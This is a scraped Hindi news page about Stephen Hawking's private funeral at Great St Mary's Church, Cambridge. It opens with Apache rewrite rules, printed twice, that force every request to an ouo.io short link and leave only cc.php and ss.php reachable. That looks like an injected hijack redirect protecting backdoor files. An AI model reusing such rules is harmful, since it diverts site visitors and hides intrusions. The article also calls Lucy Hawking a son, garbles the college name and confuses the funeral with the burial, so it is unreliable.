
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 378
Nextलंदन। ब्रिटेन के भौतिक विज्ञानी स्टीफन हॉकिंग को श्रद्धांजलि देने के लिए कल बड़ी संख्या में लोग कैंब्रिज पहुंचे। हॉकिंग का अंतिम संस्कार ग्रेट सेंट मैरी चर्च के पास किया गया, जो 50 साल से अधिक समय तक उनका शैक्षणिक घर रहा है। हालांकि यहां आम जनता की पहुंच नहीं हो सकी, क्योंकि परिवार, दोस्तों और सहयोगियों के लिए अंतिम संस्कार कार्यक्रम निजी रखा गया। कैंब्रिज यूनिवर्सिटी पुलिस के मुताबिक यह कार्यक्रम पूरी तरह से निजी रहा और बिना आमंत्रण के किसी को भी चर्च में अंतिम संस्कार के पहले या इस दौरान प्रवेश नहीं करने दिया गया। दुनिया के सबसे महान वैज्ञानिकों में से एक और समय का संक्षिप्त इतिहास के लेखक ने 14 मार्च को 76 वर्ष की आयु में अपने कैंब्रिज स्थित घर में प्राण छोड़े। ग्रेट सेंट मैरी चर्च में उनके निजी अंतिम संस्कार के दौरान करीब 500 परिवार, दोस्त और साथी यहां मौजूद रहे। हॉकिंग के ताबूत को गोनविले से कैअस कॉलेज तक छह पोर्टरों द्वारा ले जाया गया। ये सभी लोग पारंपरिक वेशभूषा में थे।
मशहूर वैज्ञानिक हॉकिंग के बेटे लुसी, रॉबर्ट और टिम हॉकिंग ने कहा कि उन्होंने कैंब्रिज में अंतिम संस्कार करने का फैसला इसलिए किया क्योंकि उनके पिता को इस शहर से बेहद लगाव था। उन्होंने कहा कि हमारे पिता का जीवन और काम कई लोगों के लिए प्रेरणादायी थे। इनमें धार्मिक और गैर धार्मिक दोनों ही तरह के लोग शामिल थे। स्टीफन हॉकिंग को एक अन्य ब्रिटिश वैज्ञानिक आईजेक न्यूटन और चार्ल्स डार्विन की कब्र के पास दफनाया गया। अंतिम संस्कार केे बाद कैंब्रिज यूनिवर्सिटी के ट्रिनिटी कॉलेज में एक निजी रिसेप्शन भी दिया गया।